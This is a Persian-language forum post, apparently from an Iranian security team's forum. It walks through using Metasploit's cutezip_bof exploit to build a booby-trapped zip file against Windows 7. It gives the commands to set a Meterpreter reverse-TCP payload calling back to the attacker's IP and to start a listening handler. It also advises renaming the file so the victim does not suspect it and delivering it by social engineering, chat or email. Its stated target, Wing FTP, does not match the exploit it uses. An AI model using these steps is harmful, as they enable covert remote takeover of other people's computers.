رفتن به مطلب

آموزش نفوذ به ویندوز 7 توسط CuteZIP

Mahan.nofozi

توسط  Mahan.nofozi،
در کتاب ها و مقالات

 اشتراک گذاری

ارسال های توصیه شده

Mahan.nofozi Newbie

 Mahan.nofozi

ارسال شده در
ارسال شده در

در این نوع حمله ما با استفاده از متااسپلویت اقدام به ایجاد یک فایل ورد با پسوند zip میکنیم و سپس این فایل رو از طرق مختلف مثل ( مهندسی اجتماعی – چت – ایمیل و . . .  ) به تارگت میدهیم .

بعد از اجرا و باز کردن فایل توسط تاگت ما موتوانیم از سیستم قربانی دسترسی بگیریم .

خوب بریم سراغ اموزش اصلی :

تارکت :Wing FTP 4.3.8

سیستم عامل حمله : بک ترک 5 یا کالی

سیستم عامل تارگت : ویندوز 7

گام اول :در ابتدا وارد بک ترک بشید و یه ترمینال جدید باز کنید و دستور Msfconsole رو بنویسید و اینتر کنید ( البته میتونید از Armitage هم استفاده کنید . تفاوتی نداره ) .

گام دوم : حالا با استفاده از دستور use exploit/windows/fileformat/cutezip_bof  وارد محیط اکسپلویت بشید .

گام سوم : در اینجا کافیه یه show options بگیرید تا بهتون بگه چه مقادیری رو باید ست کنید

گام چهارم : مقادیر زیر را عینا ست کنید در صورت اینکه مثلا مشکل پیش اومد خودتون بنویسید :)



    msf exploit (cutezip_bof)>set payload windows/meterpreter/reverse_tcp

    msf exploit (cutezip_bof)>set lhost 192.168.1.2

    msf exploit (cutezip_bof)>exploit

در اینجا ایپی 192.168.1.2 همون ایپی هکر یا ایپی خودتون هست که باید جایگزین کنید .

گام پنجم : بعد از اکسپلویت یک فایل با پسوند zip و نام msf در شاخه زیر ایجا میشود که باید این فایل رو تغییر نام بدید تا تارگت شک نکنه و متوجه حمله ما نشود .

/root/.msf4/local/msf.zip

و باعد با استفاده از دستورات زیر کامپیوتر خودمون رو اماده گرفتن اکسس از تارگت میکنیم . یه چیزی تو مایه های گوش ایستادن .

 


use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.2

exploit

در اخر هم فایل ایجاد شده در مرحله قبل را به هر طریقی که شده به تارگت میدیم تا اجرا کنه . ( چت – مهندسی اجتماعی – ایمیل و . . . ) . به محض باز کردن فایل توسط تارگت ما از سیستم تارگت شل میگیریم و میتونیم برای مرحله بعد حمله خودمون رو اماده کنیم .

برای دسترسی به شل هم کافیه یک بار دستور Sessions -l رو وارد کنید . اگر شل گرفته باشید برای شما نشون میده . که یک ایدی هم داره سپس درستور Sessions -l رو به همراه ایدی وارد کنید تا به شل تارگت وصل بشید . به این ترتیب :

 

 

با تشکر . شرکت امنیتی گاردایران ماهان (نفوذی)

 


sessions -i ID

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
مهمان
این موضوع برای عدم ارسال قفل گردیده است.
 اشتراک گذاری
رفتن به فهرست موضوع ها

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شرکت گاردایران

پردازشگران ایمن داده ي آدلان

شماره ثبت: 9438

شبکه های اجتماعی

 

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
  • اضافه کردن...

اطلاعات مهم

فعالیت شما در این انجمن به منزله تایید قوانین انجمن میباشد! شرایط استفاده

  می پذیرم